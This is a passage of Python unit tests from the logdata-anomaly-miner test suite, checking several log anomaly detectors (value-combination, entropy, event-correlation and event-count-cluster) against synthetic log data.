TestBase import time from datetime import datetime class EnhancedNewMatchPathValueComboDetectorTest(TestBase): """Unittests for the EnhancedNewMatchPathValueComboDetector.""" __expected_string = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' __expected_allowlisting_string = 'Allowlisted path(es) %s with %s.' 
fixed_dme = FixedDataModelElement('s1', b'25537 uid=') fixed_dme2 = FixedDataModelElement('s2', b' uid=2') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) match_context_sequence_me2 = MatchContext(b'25537 uid=2') seq2 = SequenceModelElement('seq2', [decimal_integer_value_me, fixed_dme2]) match_element_sequence_me2 = seq2.get_match_element('second', match_context_sequence_me2) first_seq_s1 = 'first/seq/s1' first_seq_d1 = 'first/seq/d1' datetime_format_string = '%Y-%m-%d %H:%M:%S' exp_str = " first/seq: 25537 uid=2\n " + first_seq_s1 + ": 25537 uid=\n " + first_seq_d1 + \ ": 2\n{(b'25537 uid=', 2): [%s, %s, 1]}" exp_str2 = " {(b'25537 uid=', 2): [%s, %s, 1]}\n25537 uid=2" def test1_log_atom_not_known(self): """ This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found. The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be repeatable on second run. 
""" description = "Test1EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) self.reset_output_stream() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 2, enhanced_new_match_path_value_combo_detector) # repeating should produce the same result with new extraData. 
self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 2).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, " {(b'25537 uid=', 2): [%s, %s, 2]}\n25537 uid=2" % (t, t + 2))) self.reset_output_stream() enhanced_new_match_path_value_combo_detector2 = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ 'second/seq2/d1', 'second/seq2/s2'], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(enhanced_new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(25537, b' uid=2'): [%s, %s, 1]}\n25537 uid=2" % (t, t))) def test2_log_atom_known(self): """ This test case checks the functionality of the learn_mode. If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered. 
""" description = "Test2EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) self.reset_output_stream() t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) # repeating should NOT produce the same result, only persist the new extraData. 
self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), '') self.reset_output_stream() enhanced_new_match_path_value_combo_detector2 = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ 'second/seq2/d1', 'second/seq2/s2'], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(enhanced_new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(25537, b' uid=2'): [%s, %s, 1]}\n25537 uid=2" % (t, t))) def test3_log_atom_known_from_persisted_data(self): """The persisting and reading of permitted log lines should be checked with this test.""" description = "Test3EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), 
self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) enhanced_new_match_path_value_combo_detector.do_persist() self.reset_output_stream() other_enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(other_enhanced_new_match_path_value_combo_detector, description + "2") other_log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 2, other_enhanced_new_match_path_value_combo_detector) self.assertTrue(other_enhanced_new_match_path_value_combo_detector.receive_atom(other_log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 2).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(b'25537 uid=', 2): [%s, %s, 2]}\n25537 uid=2" % (t, t + 2))) self.reset_output_stream() other_log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 5, other_enhanced_new_match_path_value_combo_detector) self.assertTrue(other_enhanced_new_match_path_value_combo_detector.receive_atom(other_log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 5).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(b'25537 uid=', 2): [%s, %s, 3]}\n25537 uid=2" % (t, t + 5))) def test4_allowlist_event_with_known_and_unknown_paths(self): """This test case checks in which cases an event is triggered and compares with 
expected results.""" description = "Test4EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = time.time() self.assertEqual(enhanced_new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % enhanced_new_match_path_value_combo_detector.__class__.__name__, self.match_element_sequence_me.get_path(), None), self.__expected_allowlisting_string % ( ', '.join(enhanced_new_match_path_value_combo_detector.target_path_list), self.match_element_sequence_me.get_path())) log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector) enhanced_new_match_path_value_combo_detector.learn_mode = False self.assertEqual(enhanced_new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % enhanced_new_match_path_value_combo_detector.__class__.__name__, [log_atom_sequence_me2.get_timestamp(), self.match_element_sequence_me2.get_path()], None), self.__expected_allowlisting_string % (', '.join(enhanced_new_match_path_value_combo_detector.target_path_list), [ log_atom_sequence_me2.get_timestamp(), self.match_element_sequence_me2.path])) def test5save_metadata(self): """This test case checks the correctness of the metadata information.""" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [ self.stream_printer_event_handler], 'Default', False, True, None, output_logline=False) t = 1 log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) 
enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me) self.assertEqual(enhanced_new_match_path_value_combo_detector.known_values_dict.get((self.fixed_dme.fixed_data, (t, t, 1))), None) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EntropyDetectorTest.py000066400000000000000000000120371437606560100301560ustar00rootroot00000000000000import unittest from aminer.analysis.EntropyDetector import EntropyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class EntropyDetectorTest(TestBase): """Unittests for the EntropyDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. """ description = "Test1EntropyDetector" # Initialize detector test_handler = TestHandler() event_entropy_detector = EntropyDetector(self.aminer_config, [test_handler], ['/value'], 0.05, False, False, 'Default', True, False) self.analysis_context.register_component(event_entropy_detector, description) # Prepare log atoms that represent string values. Anomalies are detected when character pair distributions deviate. 
# The following events are generated: # value: aminer # value: logdata-anomaly-miner # value: ait-aecid # value: austrian # value: institute # value: lfmvasacz m_1 = MatchElement('/value', b'aminer', b'aminer', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'aminer', parser_match_1, 1, None) m_2 = MatchElement('/value', b'logdata-anomaly-miner', b'logdata-anomaly-miner', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'logdata-anomaly-miner', parser_match_2, 2, None) m_3 = MatchElement('/value', b'ait-aecid', b'ait-aecid', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'ait-aecid', parser_match_3, 3, None) m_4 = MatchElement('/value', b'austrian', b'austrian', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'austrian', parser_match_4, 4, None) m_5 = MatchElement('/value', b'institute', b'institute', None) parser_match_5 = ParserMatch(m_5) log_atom_5 = LogAtom(b'institute', parser_match_5, 5, None) m_6 = MatchElement('/value', b'lfmvasacz', b'lfmvasacz', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'lfmvasacz', parser_match_6, 6, None) # Forward log atoms to detector # First value should generate an anomaly, because no frequencies are known yet # Input: aminer # Expected output: Anomaly event_entropy_detector.receive_atom(log_atom_1) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['aminer'], 'CriticalValue': 0.0, 'ProbabilityThreshold': 0.05}}) test_handler.anomaly = None # Second value should not generate an anomaly, because it contains substring 'miner' which shares charpairs with 'aminer' # Input: logdata-anomaly-miner # Expected output: None event_entropy_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Third value should not generate an anomaly, since it is a normal string # Input: ait-aecid # Expected output: None event_entropy_detector.receive_atom(log_atom_3) 
self.assertIsNone(test_handler.anomaly) # Fourth value should not generate an anomaly, since it is a normal string # Input: austrian # Expected output: None event_entropy_detector.receive_atom(log_atom_4) self.assertIsNone(test_handler.anomaly) # Fifth value should not generate an anomaly, since it is a normal string # Input: institute # Expected output: None event_entropy_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Sixth value should generate an anomaly, since it is a randomly generated string # Input: lfmvasacz # Expected output: Anomaly event_entropy_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['lfmvasacz'], 'CriticalValue': 0.02, 'ProbabilityThreshold': 0.05}}) test_handler.anomaly = None if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventCorrelationDetectorTest.py000066400000000000000000000400731437606560100320020ustar00rootroot00000000000000import unittest from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase from time import time import random class EventCorrelationDetectorTest(TestBase): """Unittests for the EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' alphabet_model = None analysis = 'Analysis.%s' @classmethod def setUpClass(cls): """Set up the data for the all tests.""" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(FixedDataModelElement(char.decode(), char)) cls.alphabet_model = FirstMatchModelElement('first', children) error_rate = 
0.000085 cls.perfect_data_diff5 = cls.generate_perfect_data(cls, 30000, 5) cls.perfect_data_diff1 = cls.generate_perfect_data(cls, 30000, 1) cls.errored_data_diff5 = cls.generate_errored_data(cls, 100000, 5, error_rate) cls.errored_data_diff1 = cls.generate_errored_data(cls, 100000, 1, error_rate) cls.errored_data_diff5_low_error_rate = cls.generate_errored_data(cls, 100000, 5, error_rate / 2.5) cls.errored_data_diff1_low_error_rate = cls.generate_errored_data(cls, 100000, 1, error_rate / 2.5) set_random_seed(42) def test1learn_from_clear_examples(self): """In this test case perfect examples are used to learn and evaluate rules. The default parameters are used.""" description = 'test1eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.perfect_data_diff1[:12000]) def test2learn_from_clear_examples_with_smaller_probabilities(self): """ Like in test1 perfect examples are used. The generation_probability and generation_factor are set to 0.5 in the first case and 0.1 in the second case. The EventCorrelationDetector should still learn the rules as expected. 
""" description = 'test2eventCorrelationDetectorTest' ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.perfect_data_diff1[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff5[:100000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.perfect_data_diff1[:100000]) def test3learn_from_examples_with_errors(self): """In this test case examples with errors are used, but still should be learned. 
The same parameters like in test1 are used.""" description = 'test3eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.errored_data_diff5[:12000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff1[:12000]) def test4learn_from_examples_with_errors_and_smaller_probabilities(self): """ In this test case examples with errors are used, but still should be learned. These tests are using a higher generation_probability and generation_factor, because the data contains errors. """ description = 'test4eventCorrelationDetectorTest' ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, 
generation_factor=0.95, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) def test5learn_safe_assumptions(self): """ In this test case p0 and alpha are chosen carefully to only find safe assumptions about the implications in the data. Therefor more iterations in the training phase are needed. """ description = 'test5eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:20000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff1[:20000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) def test6approximately_learn_implications(self): """ In this unittest p0 and alpha are chosen to approximately find sequences in log data. Therefor not as many iterations are needed to learn the rules. 
""" description = 'test6eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff5[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff1[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1[:10000]) def test7constraint_list(self): """Test the allowlisting of paths.""" description = 'test7eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description) self.assertEqual([], ecd.constraint_list) match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) # unknown path ecd.allowlist_event(self.analysis % ecd.__class__.__name__, match_element_fixed_dme.get_path(), None) self.assertEqual(['/s1'], ecd.constraint_list) # known path ecd.allowlist_event(self.analysis % ecd.__class__.__name__, match_element_fixed_dme.get_path(), None) self.assertEqual(['/s1'], 
ecd.constraint_list) def check_rules(self, sorted_back_rules, sorted_forward_rules, diff): """Check if the rules are as expected.""" for path in sorted_forward_rules: self.assertEqual(len(sorted_forward_rules[path]), 5 / diff) implications = [] trigger = b'' for rule in sorted_forward_rules[path]: trigger = rule.trigger_event[0].split('/')[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split('/')[-1].encode())) for i in range(1, len(sorted_forward_rules[path]), 1): # skipcq: PTC-W0060 self.assertIn((self.alphabet.index(trigger) + i) % len(self.alphabet), implications) for path in sorted_back_rules: self.assertEqual(len(sorted_back_rules[path]), 5 / diff) trigger = b'' implications = [] for rule in sorted_back_rules[path]: trigger = rule.trigger_event[0].split('/')[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split('/')[-1].encode())) for i in range(1, len(sorted_back_rules[path]), 1): # skipcq: PTC-W0060 self.assertIn((self.alphabet.index(trigger) - i) % len(self.alphabet), implications) def check_anomaly_detection(self, ecd, t, diff): """Check if anomalies were detected as expected.""" for char in self.alphabet: self.reset_output_stream() char = bytes([char]) parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char))) t += 5 * 3 ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)) # another LogAtom must be received to check the follow anomalies. 
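t += 5 * 3
            ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__))
            # precede anomaly: each of the 5 / diff predecessors of char must be reported as missing,
            # every other letter must not be
            for i in range(1, int(5 / diff) + 1, 1):
                self.assertIn('Event %s is missing, but should precede event %s' % (
                    repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)),
                    self.output_stream.getvalue())
            for i in range(int(5 / diff) + 1, len(self.alphabet), 1):  # skipcq: PTC-W0060
                self.assertNotIn('Event %s is missing, but should precede event %s' % (
                    repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)),
                    self.output_stream.getvalue())
            # follow anomaly: same check for the 5 / diff successors of char
            for i in range(1, int(5 / diff) + 1, 1):
                self.assertIn('Event %s is missing, but should follow event %s' % (
                    repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)),
                    self.output_stream.getvalue())
            for i in range(int(5 / diff) + 1, len(self.alphabet), 1):  # skipcq: PTC-W0060
                self.assertNotIn('Event %s is missing, but should follow event %s' % (
                    repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)),
                    self.output_stream.getvalue())

    def run_ecd_test(self, ecd, log_atoms):
        """
        Feed log_atoms to ecd in learn mode, check the learned rules, then switch learn mode off and check anomaly detection.

        @param ecd the EventCorrelationDetector under test.
        @param log_atoms the training atoms; the time difference of the first two atoms is taken as the inter-event diff.
        """
        diff = log_atoms[1].atom_time - log_atoms[0].atom_time
        log_atom = None
        for log_atom in log_atoms:
            ecd.receive_atom(log_atom)
        sorted_forward_rules = dict(sorted(ecd.forward_rules.items()))
        sorted_back_rules = dict(sorted(ecd.back_rules.items()))
        # one rule set per letter of the alphabet is expected in both directions
        self.assertEqual(len(sorted_forward_rules), len(self.alphabet_model.children))
        self.assertEqual(len(sorted_back_rules), len(self.alphabet_model.children))
        self.check_rules(sorted_back_rules, sorted_forward_rules, diff)
        ecd.learn_mode = False
        self.check_anomaly_detection(ecd, log_atom.atom_time, diff)

    def generate_perfect_data(self, iterations, diff):
        """
        Generate data without any error: the alphabet is cycled through, one atom every diff seconds.

        @param iterations number of log atoms to generate.
        @param diff time difference between consecutive atoms.
        @return list of LogAtom objects.
        """
        log_atoms = []
        t = time()
        for i in range(1, iterations + 1):
            char = bytes([self.alphabet[i % len(self.alphabet)]])
            parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char)))
            t += diff
            log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__))
        return log_atoms

    def generate_errored_data(self, iterations, diff, error_rate):
        """
        Generate data with errors according to the error_rate.

        Like generate_perfect_data, but roughly every 1/error_rate atoms the expected letter is replaced by one
        further ahead in the alphabet, so that it breaks the learned sequence.
        @param iterations number of log atoms to generate.
        @param diff time difference between consecutive atoms.
        @param error_rate fraction of atoms that carry a wrong letter.
        @return list of LogAtom objects.
        """
        log_atoms = []
        t = time()
        # scale error_rate to an integer-valued period: one error is injected every ~1/error_rate atoms
        divisor = 1
        while error_rate * divisor < 1:
            divisor *= 10
        err = divisor * error_rate
        divisor //= err
        # NOTE(review): random.uniform() below is not seeded here and set_random_seed(42) in setUpClass runs only after
        # this data has been generated, so the errored fixtures differ between runs - confirm whether that is intended.
        for i in range(1, iterations + 1):
            if i % divisor == 0:
                char = bytes([self.alphabet[int(i + random.uniform(diff + 1, len(self.alphabet))) % len(self.alphabet)]])
            else:
                char = bytes([self.alphabet[i % len(self.alphabet)]])
            parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char)))
            t += diff
            log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__))
        return log_atoms


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventCountClusterDetectorTest.py000066400000000000000000000160051437606560100321510ustar00rootroot00000000000000
import unittest
from aminer.analysis.EventCountClusterDetector import EventCountClusterDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase


class TestHandler():
    """Dummy anomaly handler that records every received event's data in a list."""

    def __init__(self):
        self.anomalies = []

    # skipcq: PYL-W0613
    def receive_event(self, name, msg, ll, evdat, atom, obj):
        """Receive anomaly information."""
        self.anomalies.append(evdat)


class EventCountClusterDetectorTest(TestBase):
    """Unittests for the EventCountClusterDetector."""

    def test1_normal_count_detection(self):
        """This test checks the normal operation of the ECCD."""
        description = "Test1EventFrequencyDetector"
        # Initialize detector for analyzing values in one path in time windows of 10 seconds
        test_handler = TestHandler()
        eccd =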
EventCountClusterDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[test_handler], target_path_list=['/p/value'], id_path_list=['/p/id'], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, persistence_id='Default', learn_mode=True, output_logline=False) self.analysis_context.register_component(eccd, description) # The following log atoms are created: # window 1: # value a: 1 time by x, 1 time by y # value b: 1 time by x # window 2: # value a: 2 times by x, 1 time by y # value b: 1 time by x # window 3: # value b: 1 time by x # value c: 1 time by x # window 4: # value a: 1 time by x # Start of window 1: m1_1 = MatchElement('/p/value', b'a', b'a', None) m1_2 = MatchElement('/p/id', b'x', b'x', None) p1 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m1_1, m1_2])) log_atom_1 = LogAtom(b'ax', p1, 1, None) m2_1 = MatchElement('/p/value', b'a', b'a', None) m2_2 = MatchElement('/p/id', b'y', b'y', None) p2 = ParserMatch(MatchElement('/p', b'ay', b'ay', [m2_1, m2_2])) log_atom_2 = LogAtom(b'ay', p2, 2, None) m3_1 = MatchElement('/p/value', b'b', b'b', None) m3_2 = MatchElement('/p/id', b'x', b'x', None) p3 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m3_1, m3_2])) log_atom_3 = LogAtom(b'bx', p3, 3, None) # Start of window 2: m4_1 = MatchElement('/p/value', b'a', b'a', None) m4_2 = MatchElement('/p/id', b'x', b'x', None) p4 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m4_1, m4_2])) log_atom_4 = LogAtom(b'ax', p4, 13, None) m5_1 = MatchElement('/p/value', b'a', b'a', None) m5_2 = MatchElement('/p/id', b'y', b'y', None) p5 = ParserMatch(MatchElement('/p', b'ay', b'ay', [m5_1, m5_2])) log_atom_5 = LogAtom(b'ay', p5, 14, None) m6_1 = MatchElement('/p/value', b'b', b'b', None) m6_2 = 